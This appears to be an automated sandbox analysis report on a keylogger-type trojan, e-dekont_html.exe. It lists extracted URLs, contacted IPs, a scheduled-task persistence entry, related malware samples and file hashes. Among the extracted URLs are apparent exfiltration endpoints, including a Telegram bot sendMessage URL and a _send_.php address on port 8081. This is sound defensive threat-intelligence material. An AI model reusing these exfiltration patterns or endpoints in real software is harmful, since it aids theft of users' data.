                                                                                                http://www.fontbureau.come-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://checkip.dyndns.orge-dekont_html.exe, 00000008.00000002.4161363308.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E99000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003EE5000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000004014000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003EBD000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000004137000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000004061000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004647000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004571000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.00000000043F4000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004523000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.000000000437F000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000033A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003386000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.office.com/lBfqe-dekont_html.exe, 00000008.00000002.4161363308.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.000000000348F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.carterandcone.comle-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://aborters.duckdns.org:8081e-dekont_html.exe, 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.fontbureau.com/designers/cabarga.htmlNe-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.founder.com.cn/cne-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.fontbureau.com/designers/frere-user.htmle-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://anotherarmy.dns.army:8081e-dekont_html.exe, 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://www.jiyu-kobo.co.jp/e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://reallyfreegeoip.orge-dekont_html.exe, 00000008.00000002.4161363308.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003386000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003360000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://www.fontbureau.com/designers8e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplese-dekont_html.exe, 00000008.00000002.4169157251.0000000003FEF000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003EC0000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003E76000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.000000000401A000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000004112000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003E4B000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004386000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.000000000435B000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004622000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.00000000044FF000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.000000000452A000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.00000000043D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://chrome.google.com/webstore?hl=enX~e-dekont_html.exe, 00000008.00000002.4161363308.0000000002F44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://www.office.com/X~e-dekont_html.exe, 00000008.00000002.4161363308.0000000002F75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodede-dekont_html.exe, 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                    		high

                                                                                                                                    World Map of Contacted IPs

                                                                                                                                    • No. of IPs < 25%
                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                    • 75% < No. of IPs

                                                                                                                                    Public IPs

                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                    149.154.167.220
                                                                                                                                    		api.telegram.orgUnited Kingdom
                                                                                                                                    		62041TELEGRAMRUfalse
                                                                                                                                    188.114.97.3
                                                                                                                                    		reallyfreegeoip.orgEuropean Union
                                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                                    188.114.96.3
                                                                                                                                    		unknownEuropean Union
                                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                                    193.122.130.0
                                                                                                                                    		checkip.dyndns.comUnited States
                                                                                                                                    		31898ORACLE-BMC-31898USfalse

                                                                                                                                    General Information

                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                    Analysis ID:1559103
                                                                                                                                    Start date and time:2024-11-20 07:51:11 +01:00
                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                    Overall analysis duration:0h 9m 43s
                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                    Report type:full
                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                    Number of analysed new started processes analysed:18
                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                    Technologies:
                                                                                                                                    • HCA enabled
                                                                                                                                    • EGA enabled
                                                                                                                                    • AMSI enabled
                                                                                                                                    Analysis Mode:default
                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                    Sample name:e-dekont_html.exe
                                                                                                                                    Detection:MAL
                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@19/15@4/4
                                                                                                                                    EGA Information:
                                                                                                                                    • Successful, ratio: 50%
                                                                                                                                    HCA Information:
                                                                                                                                    • Successful, ratio: 99%
                                                                                                                                    • Number of executed functions: 340
                                                                                                                                    • Number of non-executed functions: 12
                                                                                                                                    Cookbook Comments:
                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                    Warnings

                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                    • Execution Graph export aborted for target e-dekont_html.exe, PID 7308 because it is empty
                                                                                                                                    • Execution Graph export aborted for target fahKSvwo.exe, PID 7696 because it is empty
                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                                                                    Simulations

                                                                                                                                    Behavior and APIs

                                                                                                                                    TimeTypeDescription
                                                                                                                                    01:52:05API Interceptor7784949x Sleep call for process: e-dekont_html.exe modified
                                                                                                                                    01:52:09API Interceptor80x Sleep call for process: powershell.exe modified
                                                                                                                                    01:52:11API Interceptor5225168x Sleep call for process: fahKSvwo.exe modified
                                                                                                                                    06:52:10Task SchedulerRun new task: fahKSvwo path: C:\Users\user\AppData\Roaming\fahKSvwo.exe

                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                    IPs

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    149.154.167.220REPLY TO NOTICE GST DRC-1A_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      Xkl0PnD8zFPjfh1.wiz.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                        file.exeGet hashmaliciousAilurophile StealerBrowse
                                                                                                                                          INQUIRY_pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            P.O 423737.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                              z30ProofofPaymentAttached.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                https://drive.google.com/uc?export=download&id=1YBKJhy1GWwuEta_1b7KX-jKtXfpHDuuYGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  Fac.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                    New Order Data sheet Page.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                      Factura Honorarios 2024-11-17.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        188.114.97.3PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • www.ssrnoremt-rise.sbs/3jsc/
                                                                                                                                                        QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • filetransfer.io/data-package/zWkbOqX7/download
                                                                                                                                                        http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                                                                                                        • kklk16.bsyo45ksda.top/favicon.ico
                                                                                                                                                        gusetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • www.glarysoft.com/update/glary-utilities/pro/pro50/
                                                                                                                                                        Online Interview Scheduling Form.lnkGet hashmaliciousDucktailBrowse
                                                                                                                                                        • gmtagency.online/api/check
                                                                                                                                                        View Pdf Doc_0b40e7d2137cd39647abbd9321b34da7.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                        • f7xiz.nhgrt.top/Kbo731/96f7xiZ96?&&V5G=YW5kZXJzLmhhcnR1bmcuY2hyaXN0ZW5zZW5Acm9ja3dvb2wuY29t
                                                                                                                                                        SWIFT 103 202414111523339800 111124.pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                        • paste.ee/d/YU1NN
                                                                                                                                                        TT copy.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • www.lnnn.fun/u5w9/
                                                                                                                                                        QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • filetransfer.io/data-package/iiEh1iM3/download
                                                                                                                                                        Scan12112024,pdf.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • paste.ee/d/dc8Ru

                                                                                                                                                        Domains

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        reallyfreegeoip.orgREPLY TO NOTICE GST DRC-1A_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 188.114.96.3
                                                                                                                                                        Xkl0PnD8zFPjfh1.wiz.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        Ref#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 188.114.96.3
                                                                                                                                                        rPO_1079021908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 188.114.96.3
                                                                                                                                                        INQUIRY_pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        P.O 423737.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 188.114.96.3
                                                                                                                                                        Kayla Dennis CV.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 188.114.96.3
                                                                                                                                                        PROFORMA + PENDENTES.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        z30ProofofPaymentAttached.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        checkip.dyndns.comREPLY TO NOTICE GST DRC-1A_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        REPLY TO NOTICE GST DRC-1A_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        Xkl0PnD8zFPjfh1.wiz.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 193.122.130.0
                                                                                                                                                        Company catalog profile.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        Ref#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 132.226.8.169
                                                                                                                                                        Quote GVSE24-00815.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        Payment_transaction.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        nowe zam#U00f3wienie.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        rPO_1079021908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 158.101.44.242
                                                                                                                                                        INQUIRY_pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        api.telegram.orgREPLY TO NOTICE GST DRC-1A_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        Xkl0PnD8zFPjfh1.wiz.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        file.exeGet hashmaliciousAilurophile StealerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        INQUIRY_pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        P.O 423737.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        z30ProofofPaymentAttached.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        https://drive.google.com/uc?export=download&id=1YBKJhy1GWwuEta_1b7KX-jKtXfpHDuuYGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        Fac.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        New Order Data sheet Page.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        Factura Honorarios 2024-11-17.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220

                                                                                                                                                        ASNs

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        TELEGRAMRUREPLY TO NOTICE GST DRC-1A_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        Xkl0PnD8zFPjfh1.wiz.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        file.exeGet hashmaliciousAilurophile StealerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        INQUIRY_pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        P.O 423737.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        z30ProofofPaymentAttached.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        https://drive.google.com/uc?export=download&id=1YBKJhy1GWwuEta_1b7KX-jKtXfpHDuuYGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        Fac.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        New Order Data sheet Page.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        Factura Honorarios 2024-11-17.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        CLOUDFLARENETUSglobe_product_order_korea_buy_20_11_2024_000000000000000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                        • 104.21.91.199
                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 188.114.96.3
                                                                                                                                                        vessel details_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                        • 104.26.12.205
                                                                                                                                                        MV BUSAN STAR - calling to discharge about 55,000Mt of aggregates.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                        • 104.26.13.205
                                                                                                                                                        https://cdn-defac21.artcollective-snapclick.com/api/reg/update.jsonGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 104.21.78.162
                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.85.146
                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        https://www.google.co.ao/url?Obdy=ObM8wNGVUva21gnTm3qS&cgsr=7knoOQwChvIkzgfn0TSm&sa=t&wofc=nQYL5DF797O1da77PTBQ&url=amp%2Fprimer-distrito-amvt.org%2F.r%2FiO8EME-SUREDANNaW50ZXJtb2RhbC5qYXhAc2VhYm9hcmRtYXJpbmUuY29tGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 188.114.96.3
                                                                                                                                                        CLOUDFLARENETUSglobe_product_order_korea_buy_20_11_2024_000000000000000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                        • 104.21.91.199
                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 188.114.96.3
                                                                                                                                                        vessel details_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                        • 104.26.12.205
                                                                                                                                                        MV BUSAN STAR - calling to discharge about 55,000Mt of aggregates.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                        • 104.26.13.205
                                                                                                                                                        https://cdn-defac21.artcollective-snapclick.com/api/reg/update.jsonGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 104.21.78.162
                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.85.146
                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        https://www.google.co.ao/url?Obdy=ObM8wNGVUva21gnTm3qS&cgsr=7knoOQwChvIkzgfn0TSm&sa=t&wofc=nQYL5DF797O1da77PTBQ&url=amp%2Fprimer-distrito-amvt.org%2F.r%2FiO8EME-SUREDANNaW50ZXJtb2RhbC5qYXhAc2VhYm9hcmRtYXJpbmUuY29tGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 188.114.96.3
                                                                                                                                                        ORACLE-BMC-31898USXkl0PnD8zFPjfh1.wiz.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 158.101.44.242
                                                                                                                                                        Company catalog profile.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 158.101.44.242
                                                                                                                                                        Quote GVSE24-00815.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 158.101.44.242
                                                                                                                                                        Payment_transaction.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 158.101.44.242
                                                                                                                                                        nowe zam#U00f3wienie.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 158.101.44.242
                                                                                                                                                        rPO_1079021908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 158.101.44.242
                                                                                                                                                        owari.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 129.146.156.151
                                                                                                                                                        P.O 423737.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 193.122.130.0
                                                                                                                                                        PROFORMA + PENDENTES.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 158.101.44.242
                                                                                                                                                        QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 193.122.6.168

                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        54328bd36c14bd82ddaa0c04b25ed9adBenefit Enrollment -wZ5nusm.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        REPLY TO NOTICE GST DRC-1A_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        Ref#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        rPO_1079021908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        INQUIRY_pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        P.O 423737.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        Kayla Dennis CV.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        PROFORMA + PENDENTES.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        z30ProofofPaymentAttached.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        3b5074b1b5d032e5620f69f9f700ff0eglobe_product_order_korea_buy_20_11_2024_000000000000000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        https://docs.google.com/drawings/d/14vwfD0EyLvfyX8ls6jwkhRJmCoYW07SUFnqprqeXkTI/previewGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        vessel details_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        MV BUSAN STAR - calling to discharge about 55,000Mt of aggregates.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        https://s.id/sharedocumentGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        https://trackru.top/usGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.220

                                                                                                                                                        Dropped Files

                                                                                                                                                        No context

                                                                                                                                                        Created / dropped Files

                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\e-dekont_html.exe.log

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\Desktop\e-dekont_html.exe
                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1216
                                                                                                                                                        Entropy (8bit):5.34331486778365
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:high, very likely benign file
